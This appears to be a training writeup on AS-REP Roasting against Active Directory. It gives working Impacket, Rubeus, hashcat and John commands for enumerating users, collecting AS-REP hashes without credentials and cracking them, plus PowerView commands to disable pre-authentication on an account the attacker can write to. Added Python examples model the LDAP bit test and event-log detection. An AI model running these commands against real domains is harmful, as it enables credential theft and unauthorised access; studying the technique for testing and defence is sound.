AS-REP Roasting

Intermediate | 30 min | Writeup

Attacking accounts without pre-authentication

Learning Objectives

  • Find accounts without pre-auth
  • Request AS-REP hashes
  • Crack AS-REP responses
  • Identify vulnerable accounts

AS-REP Roasting is Kerberoasting's sibling attack. While Kerberoasting targets service accounts with SPNs, AS-REP Roasting targets accounts that don't require Kerberos pre-authentication.

The best part? You don't even need valid domain credentials. Just a list of usernames is enough to request crackable hashes for vulnerable accounts.

Pre-Authentication Explained

Normally, Kerberos requires you to prove you know the password BEFORE the KDC issues a ticket (pre-authentication: the AS-REQ carries a timestamp encrypted with the user's key). When pre-auth is disabled for an account, the KDC hands out an AS-REP for free, and the part of that reply encrypted with the user's key can be cracked offline.

How AS-REP Roasting Works

Normal Kerberos (Pre-Auth Enabled):
1. User sends AS-REQ with timestamp encrypted with password hash
2. KDC verifies timestamp (proves user knows password)
3. KDC sends AS-REP with TGT

AS-REP Roasting (Pre-Auth Disabled):
1. Attacker sends AS-REQ for target user (no proof needed!)
2. KDC happily sends AS-REP with encrypted TGT
3. Part of AS-REP is encrypted with user's hash
4. Attacker cracks offline

The attackable part:
enc-part of AS-REP = encrypted with user's hash = crackable!

Finding Vulnerable Accounts

With Domain Credentials

powershell
# PowerShell AD Module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

# PowerView
Get-DomainUser -PreauthNotRequired

# LDAP query (bitwise AND on userAccountControl; 4194304 = DONT_REQ_PREAUTH)
$search = New-Object DirectoryServices.DirectorySearcher
$search.Filter = "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
$search.FindAll()

bash
# Impacket (with creds)
GetNPUsers.py corp.local/user:password -dc-ip 192.168.1.10

# ldapsearch
ldapsearch -x -H ldap://dc.corp.local -D "user@corp.local" -w 'pass' \
  -b "DC=corp,DC=local" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
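As an added example (not part of the original writeup), this script performs the same bit test that the LDAP filter above relies on, against constructed sample userAccountControl values: the 1.2.840.113556.1.4.803 matching rule is a bitwise AND, which is why 4194304 (0x400000, DONT_REQ_PREAUTH) is the value to match. It also skips disabled accounts, which carry the flag but yield nothing. All account names and values are made up.

```python
# Added example (not from the original writeup): the bit test that the LDAP filter above performs,
# applied to constructed sample userAccountControl values. The 1.2.840.113556.1.4.803 matching rule
# is a bitwise AND, so "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" matches any entry with
# the DONT_REQ_PREAUTH bit (0x400000 = 4194304) set. Names and values below are made up.

# userAccountControl flag bits (AD schema values; only the ones used here)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000   # decimal 4194304, the value in the LDAP filter
FLAG_NAMES = {ACCOUNTDISABLE: "ACCOUNTDISABLE", NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
              DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD", DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH"}

# constructed sample directory entries: (sAMAccountName, userAccountControl)
SAMPLE_USERS = [
    ("alice",   NORMAL_ACCOUNT),                                      # pre-auth required
    ("svc_old", NORMAL_ACCOUNT | DONT_REQ_PREAUTH),                   # roastable
    ("bob",     NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH),  # flag set, but disabled
    ("carol",   NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD),               # another bit, not this one
]

def ldap_bit_and(uac, mask):
    """Emulate LDAP_MATCHING_RULE_BIT_AND (OID 1.2.840.113556.1.4.803): true when every bit in mask is set."""
    return (uac & mask) == mask

def decode_uac(uac):
    """Name the known flag bits set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if uac & bit]

def find_no_preauth(users, include_disabled=False):
    """Accounts whose DONT_REQ_PREAUTH bit is set. Disabled accounts are skipped by default:
    the KDC refuses them (KDC_ERR_CLIENT_REVOKED), so they yield no crackable AS-REP."""
    hits = []
    for name, uac in users:
        if not ldap_bit_and(uac, DONT_REQ_PREAUTH):
            continue
        if ldap_bit_and(uac, ACCOUNTDISABLE) and not include_disabled:
            continue
        hits.append(name)
    return hits

if __name__ == "__main__":
    for name, uac in SAMPLE_USERS:
        print(f"{name:8} {uac:#08x} {decode_uac(uac)}")
    print("roastable (enabled only):", find_no_preauth(SAMPLE_USERS))
```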

Without Credentials

You can test usernames without authentication. If pre-auth is disabled, the KDC returns an AS-REP. If enabled, it returns an error.

bash
# Test usernames from list (no creds needed!)
GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10

# The tool will:
# - Request AS-REP for each user
# - Get hash if pre-auth disabled
# - Get error if pre-auth enabled (confirms valid user!)

Username Enumeration Bonus

Even if pre-auth is enabled, the error message differs for valid vs invalid users. You get user enumeration for free!

Performing the Attack

From Windows

powershell
# Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

# Target specific user
.\Rubeus.exe asreproast /user:vulnerable_user /format:hashcat

# From non-domain-joined machine
.\Rubeus.exe asreproast /domain:corp.local /dc:dc.corp.local /format:hashcat

From Linux

bash
# With credentials
GetNPUsers.py corp.local/user:password -dc-ip 192.168.1.10 -request -outputfile asrep.txt

# Without credentials (user list)
GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10 -outputfile asrep.txt

# Target specific user (no creds)
GetNPUsers.py corp.local/target_user -no-pass -dc-ip 192.168.1.10

Cracking AS-REP Hashes

bash
# Hashcat mode 18200 = Kerberos 5 AS-REP
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules
hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule

# John the Ripper
john --format=krb5asrep --wordlist=rockyou.txt asrep.txt

Cracking Speed

AS-REP hashes crack slightly slower than TGS (Kerberoast) hashes, but still at millions per second on a decent GPU.

AS-REP Roasting Methodology

AS-REP Roasting Flow

1. Get Usernames: OSINT, LDAP enum, or password spray results
2. Test Pre-Auth: Request AS-REP for each user
3. Collect Hashes: Save hashes for vulnerable accounts
4. Crack: Hashcat mode 18200 with wordlists
5. Use Creds: Authenticate with cracked passwords

Setting the Vulnerability

If you have write access to a user (GenericAll, GenericWrite), you can MAKE them vulnerable to AS-REP Roasting!

powershell
# Enable "Do not require Kerberos preauthentication"
Set-ADAccountControl -Identity targetuser -DoesNotRequirePreAuth $true

# PowerView (flip the DONT_REQ_PREAUTH bit, 4194304, in userAccountControl)
Set-DomainObject -Identity targetuser -XOR @{userAccountControl=4194304}

# Now you can AS-REP Roast them!

This is an Attack Technique

Modifying accounts to disable pre-auth is detectable. Use this when you have write access but not password reset rights.
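Both the roasting request itself and the pre-auth change just described leave traces in the Windows Security log. As an added example (not part of the original writeup), the detection logic below runs over constructed sample records: event 4768 with Pre-Authentication Type 0 is a TGT issued without pre-auth, and event 4738 whose User Account Control field reads "'Don't Require Preauth' - Enabled" is the flag being switched on. Field names follow the Security log; the account names, addresses and record layout are made up.

```python
# Added example (not from the original writeup): detection rules for the two log events this page's
# techniques leave behind, run over constructed sample records in Windows Security log field names.
# 4768 with Pre-Authentication Type 0 = TGT issued without pre-auth (roasting tools usually also
# request RC4, Ticket Encryption Type 0x17); 4738 with "'Don't Require Preauth' - Enabled" = flag set.
import re

SAMPLE_EVENTS = """\
EventID: 4768
Account Name: alice
Pre-Authentication Type: 2
Ticket Encryption Type: 0x12
---
EventID: 4768
Account Name: svc_old
Pre-Authentication Type: 0
Ticket Encryption Type: 0x17
Client Address: ::ffff:10.0.0.77
---
EventID: 4738
Subject Account Name: jdoe
Target Account Name: targetuser
User Account Control: 'Don't Require Preauth' - Enabled
---
EventID: 4768
Account Name: bob
Pre-Authentication Type: 0
Ticket Encryption Type: 0x12
"""

def parse_events(text):
    """One dict per record; records are separated by '---', fields are 'Key: Value' lines."""
    events = []
    for record in text.split("---"):
        fields = dict(re.findall(r"^([^:\n]+):\s*(.*)$", record, re.MULTILINE))
        if fields:
            events.append(fields)
    return events

def detect(events):
    """Return one alert string per suspicious event (empty list when the log is clean)."""
    alerts = []
    for e in events:
        if e.get("EventID") == "4768" and e.get("Pre-Authentication Type") == "0":
            etype = e.get("Ticket Encryption Type", "")
            sev = "HIGH" if etype.lower() == "0x17" else "MEDIUM"  # RC4 is the classic tool default
            alerts.append(f"{sev}: AS-REP without pre-auth for {e['Account Name']} "
                          f"(etype {etype}) from {e.get('Client Address', 'unknown')}")
        elif e.get("EventID") == "4738" and "Don't Require Preauth' - Enabled" in e.get("User Account Control", ""):
            alerts.append(f"HIGH: {e['Subject Account Name']} disabled pre-auth on {e['Target Account Name']}")
    return alerts
```

Call `detect(parse_events(SAMPLE_EVENTS))` to see the three alerts; the first record (alice, pre-auth type 2) is correctly ignored.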

Kerberoasting vs AS-REP Roasting

Aspect             | Kerberoasting       | AS-REP Roasting
Target             | Accounts with SPNs  | Accounts without pre-auth
Credentials Needed | Any domain user     | Just username list
Hashcat Mode       | 13100 / 19700       | 18200
Prevalence         | Very common         | Less common

Knowledge Check

Quick Quiz

What makes an account vulnerable to AS-REP Roasting?

Challenges

No Creds Required

Challenge
🔥 intermediate

Using only a list of potential usernames, identify which accounts are vulnerable to AS-REP Roasting and crack at least one.


Key Takeaways

  • AS-REP Roasting targets accounts without pre-authentication required
  • No domain credentials needed - just a username list
  • Use hashcat mode 18200 for cracking
  • If you can modify a user, you can enable the vulnerability
  • Less common than Kerberoasting but still valuable
  • Username enumeration is a bonus side effect